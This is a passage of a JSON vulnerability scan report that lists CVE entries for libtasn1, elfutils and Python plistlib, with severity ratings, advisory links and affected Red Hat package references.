version: v4.20.0. The function fails to validate the size of input data resulting in a buffer overflow in asn1_expend_octet_string.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-13151" }, { "url": "http://www.openwall.com/lists/oss-security/2026/01/08/5" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-13151" }, { "url": "https://gitlab.com/gnutls/libtasn1" }, { "url": "https://gitlab.com/gnutls/libtasn1/-/merge_requests/121" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13151" }, { "url": "https://ubuntu.com/security/notices/USN-7954-1" }, { "url": "https://ubuntu.com/security/notices/USN-7954-2" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-13151" }, { "url": "https://www.kb.cert.org/vuls/id/271649" } ], "published": "2026-01-07T22:15:43+00:00", "updated": "2026-02-02T19:27:23+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "4.16.0-9.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-1371", "ratings": [ { "source": { "name": "nvd" }, "score": 5.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "redhat" }, "score": 3.3, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 404, 476 ], "description": "A vulnerability has been found in GNU elfutils 0.192 and classified as problematic. This vulnerability affects the function handle_dynamic_symtab of the file readelf.c of the component eu-read. The manipulation leads to null pointer dereference. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The patch is identified as b38e562a4c907e08171c76b8b2def8464d5a104a. It is recommended to apply a patch to fix this issue.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-1371" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-1371" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1371" }, { "url": "https://sourceware.org/bugzilla/attachment.cgi?id=15926" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32655" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32655#c2" }, { "url": "https://ubuntu.com/security/notices/USN-7369-1" }, { "url": "https://vuldb.com/?ctiid.295978" }, { "url": "https://vuldb.com/?id.295978" }, { "url": "https://vuldb.com/?submit.496484" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-1371" }, { "url": "https://www.gnu.org/" } ], "published": "2025-02-17T03:15:09+00:00", "updated": "2025-11-04T20:13:36+00:00", "affects": [ { "ref": "pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "0.193-1.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "0.193-1.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "0.193-1.el9", "status": "affected" } ] }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-1376", "ratings": [ { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "nvd" }, "score": 4.7, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 2.5, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 404 ], "description": "A vulnerability classified as problematic was found in GNU elfutils 0.192. This vulnerability affects the function elf_strptr in the library /libelf/elf_strptr.c of the component eu-strip. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The name of the patch is b16f441cca0a4841050e3215a9f120a6d8aea918. It is recommended to apply a patch to fix this issue.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-1376" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-1376" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1376" }, { "url": "https://sourceware.org/bugzilla/attachment.cgi?id=15940" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32672" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32672#c3" }, { "url": "https://vuldb.com/?ctiid.295984" }, { "url": "https://vuldb.com/?id.295984" }, { "url": "https://vuldb.com/?submit.497538" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-1376" }, { "url": "https://www.gnu.org/" } ], "published": "2025-02-17T05:15:09+00:00", "updated": "2025-11-04T20:21:18+00:00", "affects": [ { "ref": "pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "0.193-1.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "0.193-1.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "0.193-1.el9", "status": "affected" } ] }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-1377", "ratings": [ { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "nvd" }, "score": 5.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 3.3, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 404 ], "description": "A vulnerability, which was classified as problematic, has been found in GNU elfutils 0.192. This issue affects the function gelf_getsymshndx of the file strip.c of the component eu-strip. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of the patch is fbf1df9ca286de3323ae541973b08449f8d03aba. It is recommended to apply a patch to fix this issue.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-1377" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-1377" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1377" }, { "url": "https://sourceware.org/bugzilla/attachment.cgi?id=15941" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32673" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32673#c2" }, { "url": "https://ubuntu.com/security/notices/USN-7369-1" }, { "url": "https://vuldb.com/?ctiid.295985" }, { "url": "https://vuldb.com/?id.295985" }, { "url": "https://vuldb.com/?submit.497539" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-1377" }, { "url": "https://www.gnu.org/" } ], "published": "2025-02-17T05:15:10+00:00", "updated": "2025-11-04T20:26:20+00:00", "affects": [ { "ref": "pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "0.193-1.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "0.193-1.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "0.193-1.el9", "status": "affected" } ] }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-13837", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "nvd" }, "score": 5.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 5.9, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H" }, { "source": { "name": "rocky" }, "severity": "high" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 400 ], "description": "When loading a plist file, the plistlib module reads data in size specified by the file itself, meaning a malicious file can cause OOM and DoS issues", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-13837" }, { "url": "https://access.redhat.com/errata/RHSA-2026:10950" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-13837" }, { "url": "https://bugzilla.redhat.com/2395108" }, { "url": "https://bugzilla.redhat.com/2408891" }, { "url": "https://bugzilla.redhat.com/2418084" }, { "url": "https://bugzilla.redhat.com/2431366" }, { "url": "https://bugzilla.redhat.com/2431374" }, { "url": "https://bugzilla.redhat.com/2444691" }, { "url": "https://bugzilla.redhat.com/2448168" }, { "url": "https://bugzilla.redhat.com/2448181" }, { "url": "https://bugzilla.redhat.com/2457409" }, { "url": "https://bugzilla.redhat.com/2457932" }, { "url": "https://bugzilla.redhat.com/2458049" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100" }, { "url": "https://errata.almalinux.org/8/ALSA-2026-10950.html" }, { "url": "https://errata.rockylinux.org/RLSA-2026:10950" }, { "url": "https://github.com/python/cpython/commit/568342cfc8f002d9a15f30238f26b9d2e0e79036" }, { "url": "https://github.com/python/cpython/commit/5a8b19677d818fb41ee55f310233772e15aa1a2b" }, { "url": "https://github.com/python/cpython/commit/694922cf40aa3a28f898b5f5ee08b71b4922df70" }, { "url": "https://github.com/python/cpython/commit/71fa8eb8233b37f16c88b6e3e583b461b205d1ba" }, { "url": "https://github.com/python/cpython/commit/b64441e4852383645af5b435411a6f849dd1b4cb" }, { "url": "https://github.com/python/cpython/commit/cefee7d118a26ef6cd43db59bb9d98ca9a331111" }, { "url": "https://github.com/python/cpython/issues/119342" }, { "url": "https://github.com/python/cpython/pull/119343" }, { "url": "https://linux.oracle.com/cve/CVE-2025-13837.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-10950.html" }, { "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/2X5IBCJXRQAZ5PSERLHMSJFBHFR3QM2C/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13837" }, { "url": "https://ubuntu.com/security/notices/USN-8018-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-13837" } ], "published": "2025-12-01T18:16:04+00:00", "updated": "2026-03-03T15:16:14+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-14017", "ratings": [ { "source": { "name": "amazon" }, "severity": 